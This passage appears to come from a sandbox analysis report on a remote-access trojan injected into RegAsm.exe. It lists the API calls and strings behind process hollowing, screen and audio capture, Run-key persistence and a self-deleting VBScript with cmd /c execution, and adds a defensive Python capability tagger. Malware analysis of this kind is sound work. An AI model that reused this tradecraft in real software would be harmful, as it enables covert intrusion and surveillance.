                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID:
                                                        • API String ID: 1084509184-0
                                                        • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                        • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                        • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                        • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                        APIs
                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID:
                                                        • API String ID: 2299586839-0
                                                        • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                        • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
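The "APIs" field of each entry above is the report's only description of what the injected RegAsm.exe payload can do, and most of the entries are C runtime noise (locale enumeration with _free/_abort subcalls) rather than Remcos tradecraft. The following Python, added here as an example and not part of Joe Sandbox or of this report, parses entries in the report's bullet format and tags each function with a capability. Its sample input consists of lines copied from entries on this page (the CryptGenRandom routine, the IsDebuggerPresent/UnhandledExceptionFilter triple, GetUserNameW, an EnumSystemLocalesW helper, and the GDI screen-capture sequence from the entry that follows). The rule table, the tag names and the two CRT-noise filters are this example's own assumptions.

```python
"""Capability tagging for Joe Sandbox per-function "APIs" entries.

Added example for this report; not Joe Sandbox code. The rule table, the
tag names and the CRT-noise filters are this example's own assumptions.
"""
import re
from typing import Dict, List, Set, Tuple

# One "APIs" bullet: "• Name.MODULE(args), ref: ADDR" or, when the plugin
# decoded no arguments, "• Name.MODULE ref: ADDR". A "Part of subcall
# function X:" prefix marks a call made by a callee rather than this function.
API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# A function gets a tag when every group of the rule contributes a call.
CAPABILITY_RULES: Dict[str, List[Set[str]]] = {
    # screenshot: display DC -> memory bitmap -> pixels read back for exfil
    "screen_capture": [{"CreateDCA", "CreateDCW", "GetDC"},
                       {"BitBlt", "StretchBlt"},
                       {"GetDIBits"}],
    "clipboard_read": [{"OpenClipboard"}, {"GetClipboardData"}],
    "user_recon":     [{"GetUserNameW", "GetUserNameA"}],
    "csp_random":     [{"CryptAcquireContextA", "CryptAcquireContextW"},
                       {"CryptGenRandom"}],
    "anti_debug":     [{"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}],
}

# The fallback path of MSVC's __scrt_fastfail calls exactly these three APIs.
# A function whose direct calls are exactly this set is CRT code, not evasion.
CRT_FASTFAIL = {"IsDebuggerPresent", "SetUnhandledExceptionFilter",
                "UnhandledExceptionFilter"}
CRT_LOCALE_PREFIXES = ("GetLocaleInfo", "EnumSystemLocales", "IsValidCodePage")


def parse_calls(entry: str) -> List[Tuple[str, str, str, bool]]:
    """(api, module, ref, is_subcall) for each bullet in one entry."""
    return [(m["name"], m["module"], m["ref"].upper(), m["sub"] is not None)
            for m in API_LINE.finditer(entry)]


def tag_entry(entry: str) -> Set[str]:
    """Capability tags for one function entry."""
    calls = parse_calls(entry)
    direct = {api for api, _, _, sub in calls if not sub}
    every = {api for api, _, _, _ in calls}
    tags: Set[str] = set()
    if direct == CRT_FASTFAIL:
        tags.add("crt_fastfail_stub")
        every -= CRT_FASTFAIL          # keep the stub from tripping anti_debug
    if any(mod == "LIBCMT" for _, mod, _, _ in calls) and any(
            api.startswith(CRT_LOCALE_PREFIXES) for api in direct):
        tags.add("crt_locale")         # CRT locale init, not tradecraft
    for name, groups in CAPABILITY_RULES.items():
        if all(group & every for group in groups):
            tags.add(name)
    return tags


def tag_report(report: str) -> List[Set[str]]:
    """Split report text at each "APIs" field header and tag every entry."""
    chunks = re.split(r"^\s*APIs\s*$", report, flags=re.MULTILINE)
    return [tag_entry(c) for c in chunks if API_LINE.search(c)]


# Sample input: bullets copied from entries on this page (the screen-capture
# lines come from the GDI entry that follows this example).
SAMPLE_REPORT = """
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
• CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
APIs
• GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
• EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
"""

if __name__ == "__main__":
    for i, tags in enumerate(tag_report(SAMPLE_REPORT)):
        print(i, sorted(tags))
```

Two caveats the example encodes. The three-call IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter function is the fallback path of the MSVC CRT's __scrt_fastfail helper and is present in practically every statically linked MSVC binary, so a rule that treats every IsDebuggerPresent as evasion would mis-tag it; the example only raises anti_debug when the call appears outside that exact triple. Likewise the GetLocaleInfoW / EnumSystemLocalesW functions with _free and _abort subcalls are CRT locale initialisation. Both filters look only at a function's direct calls, so a callee's CRT calls never mask a real capability such as the GDI screenshot sequence.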
                                                        APIs
                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                          • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                        • DeleteDC.GDI32(00000000), ref: 00418F68
                                                        • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                        • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                        • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                        • GetIconInfo.USER32 ref: 00418FF8
                                                        • DeleteObject.GDI32(?), ref: 00419027
                                                        • DeleteObject.GDI32(?), ref: 00419034
                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                        • DeleteDC.GDI32(?), ref: 004191B7
                                                        • DeleteDC.GDI32(00000000), ref: 004191BA
                                                        • DeleteObject.GDI32(00000000), ref: 004191BD
                                                        • GlobalFree.KERNEL32(?), ref: 004191C8
                                                        • DeleteObject.GDI32(00000000), ref: 0041927C
                                                        • GlobalFree.KERNEL32(?), ref: 00419283
                                                        • DeleteDC.GDI32(?), ref: 00419293
                                                        • DeleteDC.GDI32(00000000), ref: 0041929E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                        • String ID: DISPLAY
                                                        • API String ID: 479521175-865373369
                                                        • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                        • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                        • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                        • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                        • ResumeThread.KERNEL32(?), ref: 00418470
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                        • GetLastError.KERNEL32 ref: 004184B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                        • API String ID: 4188446516-3035715614
                                                        • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                        • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                        • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                                        • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                        APIs
                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                        • ExitProcess.KERNEL32 ref: 0040D80B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                        • API String ID: 1861856835-1447701601
                                                        • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                        • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                        • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                        • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                        APIs
                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                        • ExitProcess.KERNEL32 ref: 0040D454
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                        • API String ID: 3797177996-2483056239
                                                        • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                        • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                        • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                        • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                        • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                        • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                        • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                        • lstrcatW.KERNEL32 ref: 0041263C
                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                        • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                        • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                        • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                        • API String ID: 2649220323-436679193
                                                        • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                        • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                        • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                        • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                        APIs
                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                        • SetEvent.KERNEL32 ref: 0041B2AA
                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                        • CloseHandle.KERNEL32 ref: 0041B2CB
                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                        • API String ID: 738084811-2094122233
                                                        • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                        • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                        • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                        • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Write$Create
                                                        • String ID: RIFF$WAVE$data$fmt
                                                        • API String ID: 1602526932-4212202414
                                                        • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                        • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                        • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                        • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                        • API String ID: 1646373207-255920310
                                                        • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                        • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                        • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                        • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0040CE42
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                        • CopyFileW.KERNEL32 ref: 0040CF0B
                                                        • _wcslen.LIBCMT ref: 0040CF21
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                        • CopyFileW.KERNEL32 ref: 0040CFBF
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                        • _wcslen.LIBCMT ref: 0040D001
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                        • CloseHandle.KERNEL32 ref: 0040D068
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                        • ExitProcess.KERNEL32 ref: 0040D09D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
